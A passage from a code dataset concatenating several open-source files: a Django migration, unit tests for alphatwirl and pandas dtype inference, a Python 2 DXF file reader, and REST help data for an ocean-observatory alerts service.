self.continueFill()
def stopFill(self):
self._cancel = True
self.Close()
def continueFill(self):
self._cancel = False
self.Close()
def Command(self, id, msg):
for butn in self.BTN.keys():
if id == self.BTN[butn]["id"]:
self.BTN[butn]["action"]()
return True
| gpl-3.0 | 645,004,486,327,748,500 | 37.44592 | 142 | 0.540422 | false |
tdfischer/organizer | crm/migrations/0001_initial.py | 1 | 1152 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2018-07-27 07:36
from __future__ import unicode_literals
import address.models
from django.db import migrations, models
import django.db.models.deletion
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('address', '0001_initial'),
('taggit', '0002_auto_20150616_2121'),
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('email', models.CharField(max_length=200)),
('created', models.DateTimeField(auto_now_add=True)),
('address', address.models.AddressField(blank=True, on_delete=django.db.models.deletion.CASCADE, to='address.Address')),
('tags', taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),
],
),
]
| agpl-3.0 | 8,889,659,258,526,600,000 | 35 | 170 | 0.615451 | false |
alphatwirl/alphatwirl | tests/unit/loop/test_ReaderComposite.py | 1 | 5569 | # Tai Sakuma <[email protected]>
import copy
import logging
import pytest
import unittest.mock as mock
from alphatwirl.loop import ReaderComposite
##__________________________________________________________________||
@pytest.fixture()
def obj():
return ReaderComposite()
def test_repr(obj):
repr(obj)
def test_init_with_readers():
reader1 = mock.Mock()
reader2 = mock.Mock()
readers = [reader1, reader2]
obj = ReaderComposite(readers=readers)
assert readers is not obj.readers
assert readers == obj.readers
def test_event_two_readers_two_events(obj):
"""
composite
|- reader1
|- reader2
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
obj.add(reader1)
obj.add(reader2)
events = mock.Mock()
obj.begin(events)
assert [mock.call(events)] == reader1.begin.call_args_list
assert [mock.call(events)] == reader2.begin.call_args_list
event1 = mock.Mock()
obj.event(event1)
event2 = mock.Mock()
obj.event(event2)
assert [mock.call(event1), mock.call(event2)] == reader1.event.call_args_list
assert [mock.call(event1), mock.call(event2)] == reader2.event.call_args_list
obj.end()
assert [mock.call()] == reader1.end.call_args_list
assert [mock.call()] == reader2.end.call_args_list
def test_event_nested_composite():
"""
composite1
|- composite2
| |- reader1
| |- reader2
|- reader3
"""
obj1 = ReaderComposite()
obj2 = ReaderComposite()
reader1 = mock.Mock()
reader2 = mock.Mock()
reader3 = mock.Mock()
obj1.add(obj2)
obj2.add(reader1)
obj2.add(reader2)
obj1.add(reader3)
events = mock.Mock()
obj1.begin(events)
assert [mock.call(events)] == reader1.begin.call_args_list
assert [mock.call(events)] == reader2.begin.call_args_list
assert [mock.call(events)] == reader3.begin.call_args_list
event1 = mock.Mock()
obj1.event(event1)
event2 = mock.Mock()
obj1.event(event2)
assert [mock.call(event1), mock.call(event2)] == reader1.event.call_args_list
assert [mock.call(event1), mock.call(event2)] == reader2.event.call_args_list
assert [mock.call(event1), mock.call(event2)] == reader3.event.call_args_list
obj1.end()
assert [mock.call()] == reader1.end.call_args_list
assert [mock.call()] == reader2.end.call_args_list
assert [mock.call()] == reader3.end.call_args_list
def test_return_False(obj):
"""
composite
|- reader1 (return None)
|- reader2 (return True)
|- reader3 (return False)
|- reader4
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
reader3 = mock.Mock()
reader4 = mock.Mock()
obj.add(reader1)
obj.add(reader2)
obj.add(reader3)
obj.add(reader4)
events = mock.Mock()
obj.begin(events)
reader1.event.return_value = None
reader2.event.return_value = True
reader3.event.return_value = False
event1 = mock.Mock()
ret = obj.event(event1)
assert [mock.call(event1)] == reader1.event.call_args_list
assert [mock.call(event1)] == reader2.event.call_args_list
assert [mock.call(event1)] == reader3.event.call_args_list
assert [] == reader4.event.call_args_list
assert ret is None
obj.end()
def test_no_begin_end(obj):
"""
composite
|- reader1
|- reader2 (without begin end)
|- reader3
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
del reader2.begin
del reader2.end
reader3 = mock.Mock()
obj.add(reader1)
obj.add(reader2)
obj.add(reader3)
events = mock.Mock()
obj.begin(events)
assert [mock.call(events)] == reader1.begin.call_args_list
assert [mock.call(events)] == reader3.begin.call_args_list
event1 = mock.Mock()
obj.event(event1)
event2 = mock.Mock()
obj.event(event2)
assert [mock.call(event1), mock.call(event2)] == reader1.event.call_args_list
assert [mock.call(event1), mock.call(event2)] == reader2.event.call_args_list
assert [mock.call(event1), mock.call(event2)] == reader3.event.call_args_list
obj.end()
assert [mock.call()] == reader1.end.call_args_list
assert [mock.call()] == reader3.end.call_args_list
##__________________________________________________________________||
def test_merge(obj):
"""
composite
|- reader1
|- reader2 (no merge)
|- reader3
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
reader3 = mock.Mock()
del reader2.merge
obj.add(reader1)
obj.add(reader2)
obj.add(reader3)
obj1 = copy.deepcopy(obj)
assert obj.readers[0] is reader1
assert obj.readers[1] is reader2
assert obj.readers[2] is reader3
assert obj1.readers[0] is not reader1
assert obj1.readers[1] is not reader2
assert obj1.readers[2] is not reader3
obj.merge(obj1)
assert [mock.call(obj1.readers[0])] == reader1.merge.call_args_list
assert [mock.call(obj1.readers[2])] == reader3.merge.call_args_list
##__________________________________________________________________||
def test_collect(obj):
"""
composite
|- reader1
|- reader2 (no collect)
|- reader3
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
reader3 = mock.Mock()
del reader2.collect
obj.add(reader1)
obj.add(reader2)
obj.add(reader3)
assert [reader1.collect(), None, reader3.collect()] == obj.collect()
##__________________________________________________________________||
| bsd-3-clause | -7,181,992,113,681,262,000 | 25.268868 | 80 | 0.597773 | false |
datapythonista/pandas | pandas/tests/dtypes/cast/test_infer_dtype.py | 4 | 6174 | from datetime import (
date,
datetime,
timedelta,
)
import numpy as np
import pytest
from pandas.core.dtypes.cast import (
infer_dtype_from,
infer_dtype_from_array,
infer_dtype_from_scalar,
)
from pandas.core.dtypes.common import is_dtype_equal
from pandas import (
Categorical,
Interval,
Period,
Series,
Timedelta,
Timestamp,
date_range,
)
@pytest.fixture(params=[True, False])
def pandas_dtype(request):
return request.param
def test_infer_dtype_from_int_scalar(any_int_dtype):
# Test that infer_dtype_from_scalar is
# returning correct dtype for int and float.
data = np.dtype(any_int_dtype).type(12)
dtype, val = infer_dtype_from_scalar(data)
assert dtype == type(data)
def test_infer_dtype_from_float_scalar(float_dtype):
float_dtype = np.dtype(float_dtype).type
data = float_dtype(12)
dtype, val = infer_dtype_from_scalar(data)
assert dtype == float_dtype
@pytest.mark.parametrize(
"data,exp_dtype", [(12, np.int64), (np.float_(12), np.float64)]
)
def test_infer_dtype_from_python_scalar(data, exp_dtype):
dtype, val = infer_dtype_from_scalar(data)
assert dtype == exp_dtype
@pytest.mark.parametrize("bool_val", [True, False])
def test_infer_dtype_from_boolean(bool_val):
dtype, val = infer_dtype_from_scalar(bool_val)
assert dtype == np.bool_
def test_infer_dtype_from_complex(complex_dtype):
data = np.dtype(complex_dtype).type(1)
dtype, val = infer_dtype_from_scalar(data)
assert dtype == np.complex_
@pytest.mark.parametrize(
"data", [np.datetime64(1, "ns"), Timestamp(1), datetime(2000, 1, 1, 0, 0)]
)
def test_infer_dtype_from_datetime(data):
dtype, val = infer_dtype_from_scalar(data)
assert dtype == "M8[ns]"
@pytest.mark.parametrize("data", [np.timedelta64(1, "ns"), Timedelta(1), timedelta(1)])
def test_infer_dtype_from_timedelta(data):
dtype, val = infer_dtype_from_scalar(data)
assert dtype == "m8[ns]"
@pytest.mark.parametrize("freq", ["M", "D"])
def test_infer_dtype_from_period(freq, pandas_dtype):
p = Period("2011-01-01", freq=freq)
dtype, val = infer_dtype_from_scalar(p, pandas_dtype=pandas_dtype)
if pandas_dtype:
exp_dtype = f"period[{freq}]"
else:
exp_dtype = np.object_
assert dtype == exp_dtype
assert val == p
@pytest.mark.parametrize(
"data", [date(2000, 1, 1), "foo", Timestamp(1, tz="US/Eastern")]
)
def test_infer_dtype_misc(data):
dtype, val = infer_dtype_from_scalar(data)
assert dtype == np.object_
@pytest.mark.parametrize("tz", ["UTC", "US/Eastern", "Asia/Tokyo"])
def test_infer_from_scalar_tz(tz, pandas_dtype):
dt = Timestamp(1, tz=tz)
dtype, val = infer_dtype_from_scalar(dt, pandas_dtype=pandas_dtype)
if pandas_dtype:
exp_dtype = f"datetime64[ns, {tz}]"
else:
exp_dtype = np.object_
assert dtype == exp_dtype
assert val == dt
@pytest.mark.parametrize(
"left, right, subtype",
[
(0, 1, "int64"),
(0.0, 1.0, "float64"),
(Timestamp(0), Timestamp(1), "datetime64[ns]"),
(Timestamp(0, tz="UTC"), Timestamp(1, tz="UTC"), "datetime64[ns, UTC]"),
(Timedelta(0), Timedelta(1), "timedelta64[ns]"),
],
)
def test_infer_from_interval(left, right, subtype, closed, pandas_dtype):
# GH 30337
interval = Interval(left, right, closed)
result_dtype, result_value = infer_dtype_from_scalar(interval, pandas_dtype)
expected_dtype = f"interval[{subtype}, {closed}]" if pandas_dtype else np.object_
assert result_dtype == expected_dtype
assert result_value == interval
def test_infer_dtype_from_scalar_errors():
msg = "invalid ndarray passed to infer_dtype_from_scalar"
with pytest.raises(ValueError, match=msg):
infer_dtype_from_scalar(np.array([1]))
@pytest.mark.parametrize(
"value, expected, pandas_dtype",
[
("foo", np.object_, False),
(b"foo", np.object_, False),
(1, np.int64, False),
(1.5, np.float_, False),
(np.datetime64("2016-01-01"), np.dtype("M8[ns]"), False),
(Timestamp("20160101"), np.dtype("M8[ns]"), False),
(Timestamp("20160101", tz="UTC"), np.object_, False),
(Timestamp("20160101", tz="UTC"), "datetime64[ns, UTC]", True),
],
)
def test_infer_dtype_from_scalar(value, expected, pandas_dtype):
dtype, _ = infer_dtype_from_scalar(value, pandas_dtype=pandas_dtype)
assert is_dtype_equal(dtype, expected)
with pytest.raises(TypeError, match="must be list-like"):
infer_dtype_from_array(value, pandas_dtype=pandas_dtype)
@pytest.mark.parametrize(
"arr, expected, pandas_dtype",
[
([1], np.int_, False),
(np.array([1], dtype=np.int64), np.int64, False),
([np.nan, 1, ""], np.object_, False),
(np.array([[1.0, 2.0]]), np.float_, False),
(Categorical(list("aabc")), np.object_, False),
(Categorical([1, 2, 3]), np.int64, False),
(Categorical(list("aabc")), "category", True),
(Categorical([1, 2, 3]), "category", True),
(date_range("20160101", periods=3), np.dtype("=M8[ns]"), False),
(
date_range("20160101", periods=3, tz="US/Eastern"),
"datetime64[ns, US/Eastern]",
True,
),
(Series([1.0, 2, 3]), np.float64, False),
(Series(list("abc")), np.object_, False),
(
Series(date_range("20160101", periods=3, tz="US/Eastern")),
"datetime64[ns, US/Eastern]",
True,
),
],
)
def test_infer_dtype_from_array(arr, expected, pandas_dtype):
dtype, _ = infer_dtype_from_array(arr, pandas_dtype=pandas_dtype)
assert is_dtype_equal(dtype, expected)
@pytest.mark.parametrize("cls", [np.datetime64, np.timedelta64])
def test_infer_dtype_from_scalar_zerodim_datetimelike(cls):
# ndarray.item() can incorrectly return int instead of td64/dt64
val = cls(1234, "ns")
arr = np.array(val)
dtype, res = infer_dtype_from_scalar(arr)
assert dtype.type is cls
assert isinstance(res, cls)
dtype, res = infer_dtype_from(arr)
assert dtype.type is cls
| bsd-3-clause | 5,655,230,552,501,288,000 | 28.682692 | 87 | 0.627632 | false |
JohnyEngine/CNC | deprecated/heekspython/examples/dxfReader.py | 1 | 11845 | """This module provides a function for reading dxf files and parsing them into a useful tree of objects and data.
The convert function is called by the readDXF fuction to convert dxf strings into the correct data based
on their type code. readDXF expects a (full path) file name as input.
"""
# --------------------------------------------------------------------------
# DXF Reader v0.9 by Ed Blake (AKA Kitsu)
# 2008.05.08 modif.def convert() by Remigiusz Fiedler (AKA migius)
# --------------------------------------------------------------------------
# ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
import string
from dxfImportObjects import *
class Object:
"""Empty container class for dxf objects"""
def __init__(self, _type='', block=False):
"""_type expects a string value."""
self.type = _type
self.name = ''
self.data = []
def __str__(self):
if self.name:
return self.name
else:
return self.type
def __repr__(self):
return str(self.data)
def get_type(self, kind=''):
"""Despite the name, this method actually returns all objects of type 'kind' from self.data."""
if type:
objects = []
for item in self.data:
if type(item) != list and item.type == kind:
# we want this type of object
objects.append(item)
elif type(item) == list and item[0] == kind:
# we want this type of data
objects.append(item[1])
return objects
class InitializationError(Exception): pass
class StateMachine:
"""(finite) State Machine from the great David Mertz's great Charming Python article."""
def __init__(self):
self.handlers = []
self.startState = None
self.endStates = []
def add_state(self, handler, end_state=0):
"""All states and handlers are functions which return
a state and a cargo."""
self.handlers.append(handler)
if end_state:
self.endStates.append(handler)
def set_start(self, handler):
"""Sets the starting handler function."""
self.startState = handler
def run(self, cargo=None):
if not self.startState:
raise InitializationError,\
"must call .set_start() before .run()"
if not self.endStates:
raise InitializationError, \
"at least one state must be an end_state"
handler = self.startState
while 1:
(newState, cargo) = handler(cargo)
#print cargo
if newState in self.endStates:
return newState(cargo)
#break
elif newState not in self.handlers:
raise RuntimeError, "Invalid target %s" % newState
else:
handler = newState
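# Illustrative sketch (not part of the original reader): how the StateMachine above is driven.
# Each handler returns (next_handler, cargo); a handler registered with end_state=1 terminates
# the loop, and its return value becomes the result of run().
def _example_state_machine():
    def counting(cargo):
        # increment the cargo until we decide to hand off to the end state
        cargo += 1
        if cargo >= 3:
            return done, cargo
        return counting, cargo
    def done(cargo):
        # end states simply return the final result
        return cargo
    sm = StateMachine()
    sm.add_state(counting)
    sm.add_state(done, end_state=1)
    sm.set_start(counting)
    return sm.run(0)  # -> 3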
def get_name(data):
"""Get the name of an object from its object data.
Returns a pair of (data_item, name) where data_item is the list entry where the name was found
(the data_item can be used to remove the entry from the object data). Be sure to check
name not None before using the returned values!
"""
value = None
for item in data:
if item[0] == 2:
value = item[1]
break
return item, value
def get_layer(data):
"""Expects object data as input.
Returns (entry, layer_name) where entry is the data item that provided the layer name.
"""
value = None
for item in data:
if item[0] == 8:
value = item[1]
break
return item, value
def convert(code, value):
"""Convert a string to the correct Python type based on its dxf code.
code types:
ints = 60-79, 170-179, 270-289, 370-389, 400-409, 1060-1070
longs = 90-99, 420-429, 440-459, 1071
floats = 10-39, 40-59, 110-139, 140-149, 210-239, 460-469, 1010-1059
hex = 105, 310-379, 390-399
strings = 0-9, 100, 102, 300-309, 410-419, 430-439, 470-479, 999, 1000-1009
"""
if 59 < code < 80 or 169 < code < 180 or 269 < code < 290 or 369 < code < 390 or 399 < code < 410 or 1059 < code < 1071:
value = int(float(value))
elif 89 < code < 100 or 419 < code < 430 or 439 < code < 460 or code == 1071:
value = long(float(value))
elif 9 < code < 60 or 109 < code < 150 or 209 < code < 240 or 459 < code < 470 or 1009 < code < 1060:
value = float(value)
elif code == 105 or 309 < code < 380 or 389 < code < 400:
value = int(value, 16) # should be left as string?
else: # it's already a string so do nothing
pass
return value
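# Quick illustration of convert(), checked against the code ranges documented above:
#   convert(10, "3.5")     -> 3.5          (codes 10-39 become floats)
#   convert(70, "2")       -> 2            (codes 60-79 become ints)
#   convert(330, "1A")     -> 26           (codes 310-379 are parsed as hex)
#   convert(2, "ENTITIES") -> "ENTITIES"   (codes 0-9 are left as strings)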
def findObject(infile, kind=''):
"""Finds the next occurance of an object."""
obj = False
while 1:
line = infile.readline()
if not line: # readline returns '' at eof
return False
if not obj: # We're still looking for our object code
if line.lower().strip() == '0':
obj = True # found it
else: # we are in an object definition
if kind: # if we're looking for a particular kind
if line.lower().strip() == kind:
obj = Object(line.lower().strip())
break
else: # otherwise take anything non-numeric
if line.lower().strip() not in string.digits:
obj = Object(line.lower().strip())
break
obj = False # whether we found one or not it's time to start over
return obj
def handleObject(infile):
"""Add data to an object until end of object is found."""
line = infile.readline()
if line.lower().strip() == 'section':
return 'section' # this would be a problem
elif line.lower().strip() == 'endsec':
return 'endsec' # this means we are done with a section
else: # add data to the object until we find a new object
obj = Object(line.lower().strip())
obj.name = obj.type
done = False
data = []
while not done:
line = infile.readline()
if not data:
if line.lower().strip() == '0':
#we've found an object, time to return
return obj
else:
# first part is always an int
data.append(int(line.lower().strip()))
else:
data.append(convert(data[0], line.strip()))
obj.data.append(data)
data = []
def handleTable(table, infile):
"""Special handler for dealing with nested table objects."""
item, name = get_name(table.data)
if name: # We should always find a name
table.data.remove(item)
table.name = name.lower()
# This next bit is from handleObject
# handleObject should be generalized to work with any section like object
while 1:
obj = handleObject(infile)
if obj.type == 'table':
print "Warning: previous table not closed!"
return table
elif obj.type == 'endtab':
return table # this means we are done with the table
else: # add objects to the table until one of the above is found
table.data.append(obj)
def handleBlock(block, infile):
"""Special handler for dealing with nested table objects."""
item, name = get_name(block.data)
if name: # We should always find a name
block.data.remove(item)
block.name = name
# This next bit is from handleObject
# handleObject should be generalized to work with any section like object
while 1:
obj = handleObject(infile)
if obj.type == 'block':
print "Warning: previous block not closed!"
return block
elif obj.type == 'endblk':
return block # this means we are done with the table
else: # add objects to the table until one of the above is found
block.data.append(obj)
"""These are the states/functions used in the State Machine.
states:
start - find first section
start_section - add data, find first object
object - add obj-data, watch for next obj (called directly by start_section)
end_section - look for next section or eof
end - return results
"""
def start(cargo):
"""Expects the infile as cargo, initializes the cargo."""
#print "Entering start state!"
infile = cargo
drawing = Object('drawing')
section = findObject(infile, 'section')
if section:
return start_section, (infile, drawing, section)
else:
return error, (infile, "Failed to find any sections!")
def start_section(cargo):
"""Expects [infile, drawing, section] as cargo, builds a nested section object."""
#print "Entering start_section state!"
infile = cargo[0]
drawing = cargo[1]
section = cargo[2]
# read each line, if it is an object declaration go to object mode
# otherwise create a [index, data] pair and add it to the sections data.
done = False
data = []
while not done:
line = infile.readline()
if not data: # if we haven't found a dxf code yet
if line.lower().strip() == '0':
# we've found an object
while 1: # no way out unless we find an end section or a new section
obj = handleObject(infile)
if obj == 'section': # shouldn't happen
print "Warning: failed to close previous section!"
return end_section, (infile, drawing)
elif obj == 'endsec': # This section is over, look for the next
drawing.data.append(section)
return end_section, (infile, drawing)
elif obj.type == 'table': # tables are collections of data
obj = handleTable(obj, infile) # we need to find all their contents
section.data.append(obj) # before moving on
elif obj.type == 'block': # the same is true of blocks
obj = handleBlock(obj, infile) # we need to find all their contents
section.data.append(obj) # before moving on
else: # found another sub-object
section.data.append(obj)
else:
data.append(int(line.lower().strip()))
else: # we have our code, now we just need to convert the data and add it to our list.
data.append(convert(data[0], line.strip()))
section.data.append(data)
data = []
def end_section(cargo):
"""Expects (infile, drawing) as cargo, searches for next section."""
#print "Entering end_section state!"
infile = cargo[0]
drawing = cargo[1]
section = findObject(infile, 'section')
if section:
return start_section, (infile, drawing, section)
else:
return end, (infile, drawing)
def end(cargo):
"""Expects (infile, drawing) as cargo, called when eof has been reached."""
#print "Entering end state!"
infile = cargo[0]
drawing = cargo[1]
#infile.close()
return drawing
def error(cargo):
"""Expects a (infile, string) as cargo, called when there is an error during processing."""
#print "Entering error state!"
infile = cargo[0]
err = cargo[1]
infile.close()
print "There has been an error:"
print err
return False
def readDXF(filename):
"""Given a file name try to read it as a dxf file.
Output is an object with the following structure
drawing
header
header data
classes
class data
tables
table data
blocks
block data
entities
entity data
objects
object data
where foo data is a list of sub-objects. True object data
is of the form [code, data].
"""
infile = open(filename)
sm = StateMachine()
sm.add_state(error, True)
sm.add_state(end, True)
sm.add_state(start_section)
sm.add_state(end_section)
sm.add_state(start)
sm.set_start(start)
try:
drawing = sm.run(infile)
if drawing:
drawing.name = filename
for obj in drawing.data:
item, name = get_name(obj.data)
if name:
obj.data.remove(item)
obj.name = name.lower()
setattr(drawing, name.lower(), obj)
# Call the objectify function to cast
# raw objects into the right types of object
obj.data = objectify(obj.data)
#print obj.name
finally:
infile.close()
return drawing
if __name__ == "__main__":
filename = r".\examples\block-test.dxf"
drawing = readDXF(filename)
for item in drawing.entities.data:
print item
| apache-2.0 | -6,728,610,616,327,599,000 | 30.089239 | 121 | 0.668383 | false |
asascience-open/ooi-ui-services | ooiservices/app/m2m/help_data_12577.py | 1 | 33716 | #!/usr/bin/env python
def get_help_data_12577():
"""
Alerts and Alarms help.
Data store of information to be presented when a help request is made for port 12577.
Returns a list of dictionaries associated with various requests supported on that port.
"""
help_data = [
{
'root': 'alertfilters/inv',
'endpoint': 'alertfilters/inv',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of subsites with alerts and/or alarm filters.',
'data_required': False,
'data_format': None,
'samples': [{
'sample_request': 'alertfilters/inv',
'sample_response': [ "CE01ISSM", "CE01ISSP"]
}]
},
{
'root': 'alertfilters/inv',
'endpoint': 'alertfilters/inv/{subsite}',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of nodes with alerts and/or alarm filters.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertfilters/inv/CE01ISSM',
'sample_response': [ "SBD17" ]
}]
},
{
'root': 'alertfilters/inv',
'endpoint': 'alertfilters/inv/{subsite}/{node}',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of sensors for a subsite and node with alerts and/or alarm filters.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertfilters/inv/CE01ISSM/SBD17',
'sample_response': [ "01-MOPAK0000" ]
}]
},
{
'root': 'alertfilters/inv',
'endpoint': 'alertfilters/inv/{subsite}/{node}/{sensor}',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of alerts and/or alarm filters for a subsite, node and sensor.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'sensor',
'type': 'str',
'description': 'The sensor portion of the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertfilters/inv/CE01ISSM/SBD17/01-MOPAK0000',
'sample_response': [
{
"@class" : ".AlertFilterRecord",
"enabled" : True,
"stream" : "mopak_o_dcl_accel",
"referenceDesignator" : {
"vocab" : {
"refdes" : "CE01ISSM-SBD17-01-MOPAK0000",
"instrument" : "3-Axis Motion Pack",
"tocL1" : "Coastal Endurance",
"tocL2" : "Oregon Inshore Surface Mooring",
"tocL3" : "Surface Buoy"
},
"node" : "SBD17",
"full" : True,
"sensor" : "01-MOPAK0000",
"subsite" : "CE01ISSM"
},
"pdId" : "PD1595",
"eventId" : 4,
"alertMetadata" : {
"severity" : 2,
"description" : "test user defined alerts and alarms"
},
"alertRule" : {
"filter" : "BETWEEN_EXCLUSIVE",
"valid" : True,
"lowVal" : 1.0,
"highVal" : 1.5,
"errMessage" : None
},
"eventReceiptDelta" : 5000
}]
}]
},
{
'root': 'alertfilters',
'endpoint': 'alertfilters',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of alerts and alarms in the system.',
'data_required': False,
'data_format': None,
'samples': [{
'sample_request': 'alertfilters',
'sample_response': [{
"@class" : ".AlertFilterRecord",
"enabled" : True,
"stream" : "ctdpf_j_cspp_instrument",
"referenceDesignator" : {
"vocab" : None,
"node" : "XX099",
"full" : True,
"sensor" : "01-CTDPFJ999",
"subsite" : "CE01ISSP"
},
"pdId" : "PD440",
"eventId" : 1,
"alertMetadata" : {
"severity" : 2,
"description" : "Rule 9"
},
"alertRule" : {
"filter" : "GREATER",
"valid" : True,
"lowVal" : 10.0,
"highVal" : 31.0,
"errMessage" : None
},
"eventReceiptDelta" : 0
}]
}]
},
{
'root': 'alertfilters',
'endpoint': 'alertfilters/{id}',
'method': 'GET',
'permission_required': False,
'description': 'Get an alert or alarm filter by identifier.',
'data_required': True,
'data_format': [
{ 'name': 'id',
'type': 'int',
'description': 'The identifier for an alert or alarm filter.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertfilters/1',
'sample_response': {
"@class" : ".AlertFilterRecord",
"enabled" : True,
"stream" : "ctdpf_j_cspp_instrument",
"referenceDesignator" : {
"vocab" : None,
"node" : "XX099",
"full" : True,
"sensor" : "01-CTDPFJ999",
"subsite" : "CE01ISSP"
},
"pdId" : "PD440",
"eventId" : 1,
"alertMetadata" : {
"severity" : 2,
"description" : "Rule 9"
},
"alertRule" : {
"filter" : "GREATER",
"valid" : True,
"lowVal" : 10.0,
"highVal" : 31.0,
"errMessage" : None
},
"eventReceiptDelta" : 0
}
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms',
'method': 'GET',
'permission_required': False,
'description': 'Returns a list of alerts and alarms across all subsites. ' +
'(Some sample response content abbreviated.) Numerous optional filters.',
'data_required': False,
'data_format': [
{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status.',
'valid_values': ['true', 'false', 'all'],
'default': None
},
{'name': 'results',
'type': 'int',
'description': '[Optional] Filter response result with upper limit ' +
'for values to be returned. (positive integer)',
'valid_values': None,
'default': None
},
{'name': 'sortorder',
'type': 'str',
'description': '[Optional] Filter response results in ascending or ' +
'descending order. The default is descending order.',
'valid_values': ['dsc', 'asc'],
'default': 'dsc'
}
],
'samples': [{
'sample_request': 'alertalarms',
'sample_response': [ {
"severity" : 1,
"method" : None,
"message" : "Stream statuses: degraded: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.49610252096E12,
"maxMessageLenght" : 4096,
"storeTime" : 1496102530200,
"acknowledgeTime" : None,
"acknowledgedBy" : None,
"acknowledged" : False,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "degraded",
"node" : "PC01B",
"subsite" : "CE04OSPS",
"sensor" : "05-ZPLSCB102",
"eventId" : 6865817
}]
},
{
'sample_request': 'alertalarms?results=2&acknowledged=true',
'sample_response': [ {
"severity" : -1,
"method" : None,
"message" : "Stream statuses: failed: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.496016060937E12,
"maxMessageLenght" : 4096,
"storeTime" : 1496016070167,
"acknowledgeTime" : 1496102470174,
"acknowledgedBy" : "uframe",
"acknowledged" : True,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "failed",
"node" : "PC01B",
"subsite" : "CE04OSPS",
"sensor" : "05-ZPLSCB102",
"eventId" : 6865811
}, {
"severity" : -1,
"method" : None,
"message" : "Stream statuses: failed: 1, notTracked: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.496012463445E12,
"maxMessageLenght" : 4096,
"storeTime" : 1496012470254,
"acknowledgeTime" : 1496030470221,
"acknowledgedBy" : "uframe",
"acknowledged" : True,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "failed",
"node" : "PC03A",
"subsite" : "RS03AXPS",
"sensor" : "4B-PHSENA302",
"eventId" : 6865810
} ]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/{eventId}',
'method': 'GET',
'permission_required': False,
'description': 'Returns a single alert or alarm for the eventId provided.',
'data_required': True,
'data_format': [
{'name': 'eventId',
'type': 'int',
'description': 'The alarm eventId value.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'alertalarms/6865817',
'sample_response': [ {
"severity" : 1,
"method" : None,
"message" : "Stream statuses: degraded: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.49610252096E12,
"maxMessageLenght" : 4096,
"storeTime" : 1496102530200,
"acknowledgeTime" : None,
"acknowledgedBy" : None,
"acknowledged" : False,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "degraded",
"node" : "PC01B",
"subsite" : "CE04OSPS",
"sensor" : "05-ZPLSCB102",
"eventId" : 6865817
}]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/inv',
'method': 'GET',
'permission_required': False,
'description': 'Get list of unique subsites with alerts or alarms. ' +
'Optional filter by acknowledgment status.',
'data_required': False,
'data_format': [{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status. Default is all.',
'valid_values': ['true', 'false', 'all'],
'default': None
}],
'samples': [{
'sample_request': 'alertalarms/inv',
